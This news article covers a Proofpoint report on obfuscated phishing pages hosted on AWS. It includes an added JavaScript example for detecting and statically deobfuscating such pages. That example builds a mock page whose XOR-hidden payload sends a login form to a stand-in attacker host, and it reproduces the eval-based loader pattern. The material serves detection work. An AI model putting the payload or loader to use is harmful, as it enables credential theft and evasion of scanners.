Assets used as part of phishing campaigns are being hosted on AWS, with heavy XOR obfuscation to limit detection, according to a Proofpoint report.
A phishing campaign impersonating electronic signature service DocuSign, file service ShareFile, and Microsoft Office, hosted partially on Amazon Web Services (AWS), was discovered by Proofpoint, according to a blog post published by the company on Thursday.
While consumer-targeted storage services such as Google Drive and Dropbox have frequently been used by threat actors in the past, the use of public cloud services such as AWS and Microsoft Azure is “relatively uncommon,” Proofpoint noted. For the non-AWS components of the campaign, domains were registered mostly through Russian domain registration services, with TLS certificates issued by Let’s Encrypt.
These phishing campaigns make extensive use of obfuscation to evade detection. Proofpoint noted that “Amazon itself appears to be responsive and especially vigilant in taking down abusive accounts hosting this type of material,” adding that IT security professionals “should be aware of potentially malicious content on webpages hosted on AWS S3 cloud storage.”
The landing pages observed use arrays of hex-encoded strings, which, according to Proofpoint, “when decoded, appears to include some ciphertext as well as a few strings, and then an eval statement to decode the encoded blob.” Encoding and variable names have been observed to change across deployments, further frustrating attempts at programmatic detection of phishing kits.
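The pattern described above (a hex-string array, an XOR-encrypted blob, and an `eval` that runs the decoded result) can be pulled apart statically without ever executing the page. The following is an added example written for this article, not code from Proofpoint's report or from the phishing kit itself: the landing-page source it analyzes is constructed to mimic the described layout, the variable name `_0x4f2a`, the key `k3y`, the `exfil.invalid` URL and the assumption that the XOR key is stashed as one of the short strings in the same array are all hypothetical. Because the obfuscation changes across deployments, the detector keys on structure (an array whose elements are all hex literals, a non-printable element that XOR-decodes to JavaScript-looking text under a sibling string, and a call to `eval`) rather than on any fixed variable name.

```javascript
// Added example: static deobfuscation of a phishing landing page that stores
// an array of hex-encoded strings plus an XOR-encrypted blob and eval()s it.
// The page source below is CONSTRUCTED to mimic the pattern; nothing is eval'd.

const SAMPLE_KEY = "k3y";   // hypothetical key, assumed to sit inside the array

// Helpers used only to build the constructed sample.
function toHex(str) {
  return Array.from(str, c => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}
function xorBytes(str, key) {
  return Array.from(str, (c, i) =>
    String.fromCharCode(c.charCodeAt(0) ^ key.charCodeAt(i % key.length))).join("");
}

// Mimic of a kit's final stage: repoint the login form at an attacker host (hypothetical).
const PAYLOAD = 'document.forms[0].action="https://exfil.invalid/login.php";';

// Constructed landing-page source: hex array (strings + key + ciphertext), decoder, eval.
const SAMPLE_PAGE = `
var _0x4f2a = ["${toHex("DocuSign")}","${toHex("password")}","${toHex(SAMPLE_KEY)}","${toHex(xorBytes(PAYLOAD, SAMPLE_KEY))}"];
function d(h){var s="";for(var i=0;i<h.length;i+=2)s+=String.fromCharCode(parseInt(h.substr(i,2),16));return s;}
function x(s,k){var o="";for(var i=0;i<s.length;i++)o+=String.fromCharCode(s.charCodeAt(i)^k.charCodeAt(i%k.length));return o;}
eval(x(d(_0x4f2a[3]), d(_0x4f2a[2])));
`;

// --- Static analysis side ---------------------------------------------------

// Array literals whose every element is a double-quoted hex string.
const HEX_ARRAY_RE = /\[\s*((?:"[0-9a-fA-F]+"\s*,?\s*)+)\]/g;

function fromHex(hex) {
  let out = "";
  for (let i = 0; i < hex.length; i += 2) out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  return out;
}

function isPrintable(s) {
  return /^[\x20-\x7e\t\r\n]*$/.test(s);
}

// Return every hex-string array found in the page, as arrays of hex literals.
function extractHexArrays(source) {
  const arrays = [];
  for (const m of source.matchAll(HEX_ARRAY_RE)) {
    const items = [...m[1].matchAll(/"([0-9a-fA-F]+)"/g)].map(x => x[1]);
    if (items.length && items.every(h => h.length % 2 === 0)) arrays.push(items);
  }
  return arrays;
}

// Decode each array: printable elements are reported as strings; non-printable
// elements are treated as ciphertext and tried against every short sibling
// string as an XOR key. A candidate is accepted only if the result is printable
// and contains JavaScript-looking punctuation.
function deobfuscate(source) {
  const findings = [];
  for (const arr of extractHexArrays(source)) {
    const strings = arr.map(fromHex);
    const keyCandidates = strings.filter(s => s.length > 0 && s.length <= 8 && isPrintable(s));
    for (const s of strings) {
      if (isPrintable(s)) { findings.push({ kind: "string", value: s }); continue; }
      for (const key of keyCandidates) {
        const plain = xorBytes(s, key);
        if (isPrintable(plain) && /[;=(){}]/.test(plain)) {
          findings.push({ kind: "xor-decoded", key, value: plain });
          break;
        }
      }
    }
  }
  return findings;
}

// Structural verdict: eval() present AND a hex-array element XOR-decodes to code.
function isSuspicious(source) {
  const evalPresent = /\beval\s*\(/.test(source);
  const decodedCode = deobfuscate(source).some(f => f.kind === "xor-decoded");
  return evalPresent && decodedCode;
}

console.log(deobfuscate(SAMPLE_PAGE));
console.log("suspicious:", isSuspicious(SAMPLE_PAGE));
```

Run against a real page, `deobfuscate` hands you the recovered strings (brand names, form field names, the exfiltration URL) for indicator extraction, while `isSuspicious` gives a yes/no that survives the renaming of variables and functions between deployments. The key-in-array assumption is the weak point: a kit that fetches its key from elsewhere needs a different recovery step, which is why the verdict is kept separate from the decoder.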
The report provides visualizations of the various layers of obfuscation employed by the phishers.
Use of public cloud platforms for phishing campaigns is not new, though it is an increasingly attractive option: the benefits cloud computing offers the enterprise are equally applicable to cybercriminals. In December 2018, a Menlo Security report indicated that attackers were using Google Cloud Platform for phishing campaigns, while a January 2019 report from Netskope found that Google App Engine was used for a malware campaign.